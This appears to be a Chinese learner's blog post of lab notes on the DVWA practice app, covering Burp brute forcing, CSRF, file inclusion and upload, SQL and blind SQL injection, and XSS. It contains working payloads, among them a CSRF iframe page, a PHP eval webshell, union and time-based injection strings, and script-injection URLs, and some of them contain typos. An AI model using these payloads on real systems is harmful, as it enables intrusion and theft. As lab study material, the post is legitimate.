<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="大姐姐就该有大姐姐的亚子">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA差点就把Kae姐姐劝退成功了！">
<meta property="og:url" content="http://Kaeeee.github.io/2019/07/31/DVWA差点就把Kae姐姐劝退成功了！/index.html">
<meta property="og:site_name" content="从零开始的Kae">
<meta property="og:description" content="大姐姐就该有大姐姐的亚子">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-08-01T15:33:19.686Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DVWA差点就把Kae姐姐劝退成功了！">
<meta name="twitter:description" content="大姐姐就该有大姐姐的亚子">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://Kaeeee.github.io/2019/07/31/DVWA差点就把Kae姐姐劝退成功了！/">





  <title>DVWA差点就把Kae姐姐劝退成功了！ | 从零开始的Kae</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">从零开始的Kae</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">今天Kae也没有放弃呢</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://Kaeeee.github.io/2019/07/31/DVWA差点就把Kae姐姐劝退成功了！/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Kae">
      <meta itemprop="description" content>
      <meta itemprop="image" content="https://s2.ax1x.com/2019/07/31/eNogTe.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="从零开始的Kae">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">DVWA差点就把Kae姐姐劝退成功了！</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-07-31T23:56:26+08:00">
                2019-07-31
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  2.4k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  10
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="大姐姐就该有大姐姐的亚子"><a href="#大姐姐就该有大姐姐的亚子" class="headerlink" title="大姐姐就该有大姐姐的亚子"></a>大姐姐就该有大姐姐的亚子</h2><a id="more"></a>
<h2 id="DVWA"><a href="#DVWA" class="headerlink" title="DVWA"></a>DVWA</h2><p>我不会SQLmap❓什么时候教我❓</p>
<h3 id="Brute-Force"><a href="#Brute-Force" class="headerlink" title="Brute Force"></a>Brute Force</h3><p><strong>学习目标</strong></p>
<ul>
<li>掌握Burp Suite 爆破的基本操作，了解各种模式</li>
<li>掌握漏洞的原理，分析如何防范该漏洞</li>
</ul>
<p><strong>抓本地的包</strong><br>需要将浏览器地址写成localhost./DVWA/这种形式，原因不是很明确，什么强制地址解析之类的❓</p>
<p><strong>burp基本使用</strong><br>可以直接在<strong>Raw</strong>中修改包的内容，通过<strong>forword</strong>将修改后的包忠诚传递过去。不要这个包可以<strong>Drop</strong></p>
<p><strong>进行包重放</strong><br><strong>send to repeater</strong>点击<strong>go</strong>可以看到抓到的包和包的返回结果。</p>
<p><strong>爆破操作</strong><br><strong>Send to Intruder</strong><br>通过<strong>Positions中的clear</strong>和<strong>add</strong>选择爆破的参数<br>在<strong>Payloads</strong>中的<strong>load</strong>加载字典</p>
<p><strong>四种爆破模式</strong></p>
<ul>
<li>Sniper单参数爆破，多参数时同一个字典按顺序替换各参数，总之初始值有一个参数不变</li>
<li>Battering ram 多参数同时爆破，但用的是同一个字典（一对一）</li>
<li>Pichfork 多参数同时爆破，但用的是不同的字典（一对一）</li>
<li>Cluster bamb 多参数做<strong>笛卡尔乘积</strong>模式爆破</li>
</ul>
<p><strong>带有规律性的token验证</strong></p>
<ol>
<li>在Options中找到Rediections模块，选择always，允许重定向</li>
<li>在Options中找到Grep-Extract模块，点击Add，并设置筛选条件，得到user_token。且只能使用单线程</li>
<li>在Payloads中为选择的参数设置字典</li>
<li>token参数类型设置为<strong>Recursive grep</strong>并在*<em>Initial payload for first found *</em>中填入抓取包中的token</li>
<li>开始爆破</li>
</ol>
<p>High爆不出来❓</p>
<h3 id="Command-Injection"><a href="#Command-Injection" class="headerlink" title="Command Injection"></a>Command Injection</h3><p>没有回显❓</p>
<h3 id="CSRF（跨站请求伪造）"><a href="#CSRF（跨站请求伪造）" class="headerlink" title="CSRF（跨站请求伪造）"></a>CSRF（跨站请求伪造）</h3><p>利用受害者尚未失效的身份认证信息，诱骗其点击恶意链接或者访问包换攻击代码的页面，在受害人不知情的情况下以受害者的身份向服务器发送请求，从而完成非法操作。</p>
<p>诱导用户访问改地址就可以修改密码了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/dvwa/vulnerabilities/csrf/?password_new=111111&amp;password_conf=111111&amp;Change=Change#</span><br></pre></td></tr></table></figure>

<p><strong>伪造方法：</strong>不能跨浏览器</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;http://192.168.197.136/dvwa/vulnerabilities/csrf/?password_new=111111&amp;password_conf=111111&amp;Change=Change#&quot; border=&quot;0&quot; style=&quot;display:none;&quot;/&gt;</span><br><span class="line"></span><br><span class="line">&lt;h1&gt;404&lt;h1&gt;</span><br><span class="line"></span><br><span class="line">&lt;h2&gt;file not found.&lt;h2&gt;</span><br></pre></td></tr></table></figure>

<p>检查referer 中的name找主机名和当前页面URL地址是否相同：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">stripos( $_SERVER[ &apos;HTTP_REFERER&apos; ] ,$_SERVER[ &apos;SERVER_NAME&apos; ]) !== false</span><br><span class="line"></span><br><span class="line">$_SERVER[&apos;SERVER_NAME&apos;] #当前运行脚本所在服务器主机的名称。</span><br><span class="line">$_SERVER[&apos;HTTP_REFERER&apos;] #链接到当前页面的前一页面的 URL 地址。</span><br></pre></td></tr></table></figure>

<p><strong>漏洞利用：</strong></p>
<ul>
<li>想要通过验证，就必须保证在http请求中Referer字段中必须包含Host，所以我们只需要把我们的文件名改成他的Host的name就可以完美的通过验证。很容易被发现 。</li>
</ul>
<p>token验证：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// Check Anti-CSRF token </span><br><span class="line">       checkToken( $_REQUEST[ &apos;user_token&apos; ], $_SESSION[ &apos;session_token&apos; ], &apos;index.php&apos; );</span><br></pre></td></tr></table></figure>

<p><strong>攻击思路</strong></p>
<ul>
<li><p>获取用户token，cookie。可以通过xss获取token，构造攻击页面引诱目标访问(理想思路，涉及到跨站访问，不能实现)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">&lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line"></span><br><span class="line">    function attack()</span><br><span class="line"></span><br><span class="line">  &#123;</span><br><span class="line"></span><br><span class="line">   document.getElementsByName(&apos;user_token&apos;)[0].value=document.getElementById(&quot;hack&quot;).contentWindow.document.getElementsByName(&apos;user_token&apos;)[0].value;</span><br><span class="line"></span><br><span class="line">  document.getElementById(&quot;transfer&quot;).submit(); </span><br><span class="line"></span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;http://192.168.153.130/dvwa/vulnerabilities/csrf&quot; id=&quot;hack&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;/iframe&gt;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">&lt;body onload=&quot;attack()&quot;&gt;</span><br><span class="line"></span><br><span class="line">  &lt;form method=&quot;GET&quot; id=&quot;transfer&quot; action=&quot;http://192.168.153.130/dvwa/vulnerabilities/csrf&quot;&gt;</span><br><span class="line"></span><br><span class="line">   &lt;input type=&quot;hidden&quot; name=&quot;password_new&quot; value=&quot;password&quot;&gt;</span><br><span class="line"></span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;password_conf&quot; value=&quot;password&quot;&gt;</span><br><span class="line"></span><br><span class="line">   &lt;input type=&quot;hidden&quot; name=&quot;user_token&quot; value=&quot;&quot;&gt;</span><br><span class="line"></span><br><span class="line">  &lt;input type=&quot;hidden&quot; name=&quot;Change&quot; value=&quot;Change&quot;&gt;</span><br><span class="line"></span><br><span class="line">   &lt;/form&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>burp的插件CSRF Token Tracker绕过，设置好变量名就好啦</p>
</li>
</ul>
<p><strong>漏洞防范及修复：</strong><br>要求输入原始密码+token+session cookie</p>
<h3 id="File-Inclusion"><a href="#File-Inclusion" class="headerlink" title="File Inclusion"></a>File Inclusion</h3><p>对于php来说，常见的文件包含函数有如下：<br>1.include()<br>2.include_once()<br>3.require()<br>4.require_once()<br>5.file_open()</p>
<p><strong>测试文件上传的方法</strong>后缀分别为php和txt分别上传<br>黑名单限制一般采取双写方法绕过<br>白名单例如file限制采取file://协议访问<strong>本地</strong>计算机中的文件</p>
<p><strong>防范方法：</strong>白名单做更严格的限制，限制具体到文件名</p>
<h3 id="File-Update-文件上传"><a href="#File-Update-文件上传" class="headerlink" title="File Update 文件上传"></a>File Update 文件上传</h3><p><strong>目标：</strong>上传一句话木马getshell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	@eval($_POST[&apos;Kae Y&apos;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>❓不知道为什么DVWA的登陆密码自己从password改成了admin太奇怪了，查了数据库才知道为什么一直登陆不上。</p>
<p>对于限制文件类型，一般采用抓包修改文件类型forward即可。<br>除此之外还可以利用文件包含漏洞，上传eval.png利用文件包含执行代码。</p>
<p>❓<strong>（不行）</strong>在php版本小于5.3.4的服务器中，当<strong>Magic_quote_gpc选项为off</strong>时，可以在文件名中使用<strong>%00截断</strong>，所以可以把上传文件命名为hack.php%00.png。<br>❓百分之00截断抓包修改十六进制文件？</p>
<p>限制文件头的情况目前来看需要结合文件包含才能执行代码。</p>
<h3 id="Insecure-CAPTCHA-（不安全的验证码）"><a href="#Insecure-CAPTCHA-（不安全的验证码）" class="headerlink" title="Insecure CAPTCHA （不安全的验证码）"></a>Insecure CAPTCHA （不安全的验证码）</h3><p>服务器通过调用<strong>recaptcha_check_answer函</strong>数检查用户输入的正确性。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">recaptcha_check_answer($privkey,$remoteip, $challenge,$response)</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">参数$privkey是服务器申请的private key ，</span><br><span class="line">$remoteip是用户的ip，</span><br><span class="line">$challenge 是recaptcha_challenge_field 字段的值，</span><br><span class="line">来自前端页面 ，</span><br><span class="line">$response`是 recaptcha_response_field 字段的值。</span><br></pre></td></tr></table></figure>

<p>函数返回ReCaptchaResponse class的实例，ReCaptchaResponse 类有2个属性 ：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$is_valid是布尔型的，</span><br><span class="line">表示校验是否有效，</span><br><span class="line">$error</span><br><span class="line">是返回的错误代码。</span><br><span class="line"></span><br><span class="line">❓</span><br></pre></td></tr></table></figure>

<h3 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h3><p><strong>步骤：</strong></p>
<ul>
<li><p>判断是否存在SQL注入（一般用到<strong>‘</strong>），确定数据库poc</p>
</li>
<li><p>确定SQL查询语句中的字段数</p>
</li>
<li><p>确定显示的字段顺粗</p>
</li>
<li><p>获取当前数据库</p>
</li>
<li><p>获取数据库中的表</p>
</li>
<li><p>获取表中的列名</p>
</li>
<li><p>下载数据库</p>
</li>
<li><p>坐牢</p>
<p>查询<strong>当前数据库</strong>常用语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos; union select 1,database()#</span><br></pre></td></tr></table></figure>

<p>查询DVWA数据库中的<strong>表</strong>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1’ union select 1,table_name from information_schena.tables where table_name=&apos;dvwa&apos;#</span><br></pre></td></tr></table></figure>

<p>查询表中的<strong>列</strong>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1‘ union select 1,column_name from information_schema.columns where table_name =’users‘#</span><br></pre></td></tr></table></figure>

<p>查询表中<strong>列的值</strong>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos; union select 1,concat(user,password) from users#</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>mysql_real_escape_string函数是实现转义 SQL 语句字符串中的特殊字符，如输入单引号’则处理时会在其前面加上右斜杠\来进行转义，如果语句错误则输出相应的错误信息。其中受影响的字符如下：<br>    <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">\x00  </span><br><span class="line">\n  </span><br><span class="line">\r  </span><br><span class="line">\ </span><br><span class="line">&apos;  </span><br><span class="line">&quot;  </span><br><span class="line">\x1a</span><br></pre></td></tr></table></figure></p>
<p>针对mysql_real_escape_string函数解决语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=2 union select 1,table_name from information_schema.tables wheretable_schema=(select database())#&amp;Submit=Submit</span><br></pre></td></tr></table></figure>

<p>除此之外可以通过十六进制进行绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=2 union select 1,column_name from information_schema.columns where table_name=0x7573657273#&amp;Submit=Subumit</span><br></pre></td></tr></table></figure>

<h3 id="SQL-Injection-Blind-盲注"><a href="#SQL-Injection-Blind-盲注" class="headerlink" title="SQL Injection (Blind)盲注"></a>SQL Injection (Blind)盲注</h3><ul>
<li>不显示数据库内建的报错信息<ul>
<li>内建的报错信息帮助开发人员发现和修复问题</li>
<li>报错信息提供关于系统的大量的有用信息</li>
</ul>
</li>
<li>当程序员隐藏了数据库内建报错信息，替换为通用的错误提示，sql注入将无法依据报错信息判断注入语句的执行结果，也即是盲</li>
<li>思路：既然无法给予报错信息判断结果，基于逻辑真假的不用结果来判断<ul>
<li>1’ and 1=1 –+</li>
<li>1’ and 1=2 –+’</li>
</ul>
</li>
</ul>
<p><strong>步骤：</strong><br><strong>布尔盲注：</strong></p>
<ul>
<li><p>判断是否存在注入，注入字符型还是数字型</p>
<ul>
<li>1’ and 1=1#</li>
<li>1’ and 1=2#</li>
</ul>
</li>
<li><p>猜解当前 数据库名 </p>
<ul>
<li><p><strong>猜测数据库名长度：</strong>1’and length(database())=数字<strong>n</strong></p>
</li>
<li><p><strong>用二分法猜数据库名字</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1&apos; and ascii(substr(database(),1,1))&gt; 97#</span><br><span class="line">substr(string,int1,int2)</span><br><span class="line">string需要截取的字符串</span><br><span class="line">int1截取字符串的开始位置（0和1都是从第一个卫视开始截取）</span><br><span class="line">b截取的长度</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>猜解数据库中的表名</p>
<ul>
<li>猜测数据库中表的个数<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos; and ( select count(table_name) from information_schema.tables where table_schema=database())=1</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>猜表名长度</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos; and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1#</span><br></pre></td></tr></table></figure>
</li>
<li><p>猜表名</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos; and ascii(substr table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)&gt;97</span><br></pre></td></tr></table></figure>
</li>
<li><p>猜解表中的字段名</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//字段数</span><br><span class="line">1&apos; and (select count(column_name) from information_schema.columns where table_name=&apos;users&apos;)=1</span><br></pre></td></tr></table></figure>

  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//猜测字段长度</span><br><span class="line">1&apos; and length(substr((select column_name from information_schema.columns where table_name=&apos;users&apos; limit 0,1),1)=1</span><br></pre></td></tr></table></figure>

  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">//</span><br></pre></td></tr></table></figure>
</li>
<li><p>猜解数据</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">//猜数据</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p><strong>基于时间的盲注：</strong></p>
<p>抓包改参数id为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1 and if(length(database())=4,sleep(5),1) #</span><br></pre></td></tr></table></figure>

<p>明显延迟，说明数据库名的长度为4个字符；</p>
<p>抓包改参数id为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1 and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #</span><br></pre></td></tr></table></figure>

<p>明显延迟，说明数据中的第一个表名长度为9个字符；</p>
<p>抓包改参数id为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1 and if((select count(column_name) from information_schema.columns where table_name=0×7573657273 )=8,sleep(5),1) #</span><br></pre></td></tr></table></figure>

<p>明显延迟，说明uers表有8个字段。</p>
<p><strong>防御机制：</strong>采用PDO技术，划清代码和数据的界限。</p>
<h3 id="Weak-Session-IDs"><a href="#Weak-Session-IDs" class="headerlink" title="Weak Session IDs"></a>Weak Session IDs</h3><h3 id="XSS（DOM）"><a href="#XSS（DOM）" class="headerlink" title="XSS（DOM）"></a>XSS（DOM）</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost./dvwa/vulnerabilities/xss_d/?default=&lt;script&gt;alert(&quot;hack&quot;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>对于过滤<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">```</span><br><span class="line">&lt;img  src=1  οnerrοr=(&apos;hack&apos;)&gt;</span><br></pre></td></tr></table></figure></p>
<p>对于参数在value中的采取闭合前面标签的方式绕过<br>case语句的白名单可采用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost./dvwa/vulnerabilities/xss_d/?default=English #&lt;script&gt;alert(&quot;hack&quot;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><strong>防御方式：</strong>对输入的信息不进行url编码<br><strong>防御反射性XSS方法：</strong>将</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;</span><br><span class="line">&gt;</span><br><span class="line">&amp;</span><br><span class="line">&quot;</span><br><span class="line">、</span><br><span class="line">&quot;&quot;</span><br></pre></td></tr></table></figure>

<p>符号转换成html实体，防止浏览器将其作为html元素</p>
<h3 id="CSP-Bypass-内容安全策略绕过"><a href="#CSP-Bypass-内容安全策略绕过" class="headerlink" title="CSP Bypass  内容安全策略绕过"></a>CSP Bypass  内容安全策略绕过</h3><p>HTTP 头中有 <strong>Content-Security-Policy</strong> 标签 ，浏览器会根据标签里面的内容，判断哪些资源可以加载或执行。防止XSS攻击的工具。</p>
<p>❓</p>
<h3 id="Java-Script-Attacks-JS攻击"><a href="#Java-Script-Attacks-JS攻击" class="headerlink" title="Java Script Attacks JS攻击"></a>Java Script Attacks JS攻击</h3><p>❓</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/31/PHP-MySQL劝退？/" rel="next" title="PHP&MySQL劝退？">
                <i class="fa fa-chevron-left"></i> PHP&MySQL劝退？
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/01/要学一百遍的Python/" rel="prev" title="要学一百遍的Python">
                要学一百遍的Python <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="https://s2.ax1x.com/2019/07/31/eNogTe.jpg" alt="Kae">
            
              <p class="site-author-name" itemprop="name">Kae</p>
              <p class="site-description motion-element" itemprop="description">Kae没有放弃，是你放弃了Kae。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          
        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#大姐姐就该有大姐姐的亚子"><span class="nav-number">1.</span> <span class="nav-text">大姐姐就该有大姐姐的亚子</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DVWA"><span class="nav-number">2.</span> <span class="nav-text">DVWA</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Brute-Force"><span class="nav-number">2.1.</span> <span class="nav-text">Brute Force</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Command-Injection"><span class="nav-number">2.2.</span> <span class="nav-text">Command Injection</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF（跨站请求伪造）"><span class="nav-number">2.3.</span> <span class="nav-text">CSRF（跨站请求伪造）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#File-Inclusion"><span class="nav-number">2.4.</span> <span class="nav-text">File Inclusion</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#File-Update-文件上传"><span class="nav-number">2.5.</span> <span class="nav-text">File Update 文件上传</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Insecure-CAPTCHA-（不安全的验证码）"><span class="nav-number">2.6.</span> <span class="nav-text">Insecure CAPTCHA （不安全的验证码）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" 